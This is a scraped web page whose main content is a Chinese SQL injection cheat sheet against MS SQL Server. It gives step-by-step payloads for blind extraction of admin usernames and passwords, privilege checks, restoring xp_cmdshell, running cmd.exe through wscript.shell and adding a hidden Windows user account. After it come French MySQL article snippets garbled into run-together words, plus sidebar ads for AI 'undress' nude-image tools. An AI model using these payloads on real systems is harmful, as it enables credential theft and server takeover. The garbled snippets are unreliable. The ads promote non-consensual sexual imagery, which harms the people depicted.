bitsCN.com
SQL注射语句
1.判断有无注入点
' ; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0(select count(*) from *)
and 0(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0
and 0
and 1
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
看服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)--
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and 'sa'=(Select System_user)--
and user_name()='dbo'--
and 0(select user_name()--
看xp_cmdshell是否删除
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND
name = 'xp_cmdshell')--
xp_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc
'xp_cmdshell','c:/inetpub/wwwroot/xplog70.dll'--
反向PING自己实验
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec
sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
加帐号
;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user
jiaoniang$ 1866574 /add'--
创建一个虚拟目录E盘:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -
bitsCN.com
Comment abandonner ou modifier une vue existante dans MySQL?May 16, 2025 am 12:11 AMTadropaviewinmysql, utilisez "dropVieVieFexistView_name;" andtomodifyAview, utilisez "CreateOrrePlaceViewView_NameasSelect ...". WHENDROPPINGAVIEW, Considérez les dépenses et utilise "showCreateViewView_name;
Vues MySQL: quels modèles de conception puis-je utiliser avec?May 16, 2025 am 12:10 AMMysqlViewScaneffectivelyulizeSesIgnPatternslikEadapter, décorateur, usine, andobserver.1) adapterpatternadaptsdatafromdifferentTablesIntoaunifiedView.
Quels sont les avantages de l'utilisation de vues dans MySQL?May 16, 2025 am 12:09 AMVuesInmysqLareBeneficialForsImpliftifiedComplexQueries, améliingSecUrit, assurant la dataconsistence et optimisation
Comment puis-je créer une vue simple dans MySQL?May 16, 2025 am 12:08 AMToCreateasImpleViewInMysQl, usethCreatEViewstatement.1) définietheViewwithCreateEViewView_Nameas.2)
MySQL Créer une instruction utilisateur: Exemples et erreurs courantesMay 16, 2025 am 12:04 AMToCreateUsersinmysql, usethcreateuserstatement.1) ForalocalUser: CreateUser'LocAlUser '@' localhost'identifiedby'securepassword '; 2) forareMoteUser: CreateUser'RemoteUser' @ '%' identifiéBy'strongPassword '; 3)
Quelles sont les limites de l'utilisation de vues dans MySQL?May 14, 2025 am 12:10 AMMySQLViewShavelimitations: 1) Theydon'tsupportalLSQLOPERations, restreignantDatamanipulation à travers la vue
Sécuriser votre base de données MySQL: ajouter des utilisateurs et accorder des privilègesMay 14, 2025 am 12:09 AMLa bonne gestion de la gestion de la direction
Quels facteurs influencent le nombre de déclencheurs que je peux utiliser dans MySQL?May 14, 2025 am 12:08 AMMySQLDOES NONTIMPOSEAHARDLIMITORSTRIGRERS, BUTPRATICALFACTORSEDERTERMINETHEIREFFECTYUSE: 1) ServerConfiguration ImpactStriggerManagement; 2) ComplexTriggersInCreasgeSystemload; 3) LargerTableSlowtriggerPerformance; 4) HighCunCurrencyCanCauseTr fichestring; 5) M) M
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
Video Face Swap
Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !
Article chaud
Outils chauds
ZendStudio 13.5.1 Mac
Puissant environnement de développement intégré PHP
Listes Sec
SecLists est le compagnon ultime du testeur de sécurité. Il s'agit d'une collection de différents types de listes fréquemment utilisées lors des évaluations de sécurité, le tout en un seul endroit. SecLists contribue à rendre les tests de sécurité plus efficaces et productifs en fournissant facilement toutes les listes dont un testeur de sécurité pourrait avoir besoin. Les types de listes incluent les noms d'utilisateur, les mots de passe, les URL, les charges utiles floues, les modèles de données sensibles, les shells Web, etc. Le testeur peut simplement extraire ce référentiel sur une nouvelle machine de test et il aura accès à tous les types de listes dont il a besoin.
Télécharger la version Mac de l'éditeur Atom
L'éditeur open source le plus populaire
MinGW - GNU minimaliste pour Windows
Ce projet est en cours de migration vers osdn.net/projects/mingw, vous pouvez continuer à nous suivre là-bas. MinGW : un port Windows natif de GNU Compiler Collection (GCC), des bibliothèques d'importation et des fichiers d'en-tête librement distribuables pour la création d'applications Windows natives ; inclut des extensions du runtime MSVC pour prendre en charge la fonctionnalité C99. Tous les logiciels MinGW peuvent fonctionner sur les plates-formes Windows 64 bits.
MantisBT
Mantis est un outil Web de suivi des défauts facile à déployer, conçu pour faciliter le suivi des défauts des produits. Cela nécessite PHP, MySQL et un serveur Web. Découvrez nos services de démonstration et d'hébergement.
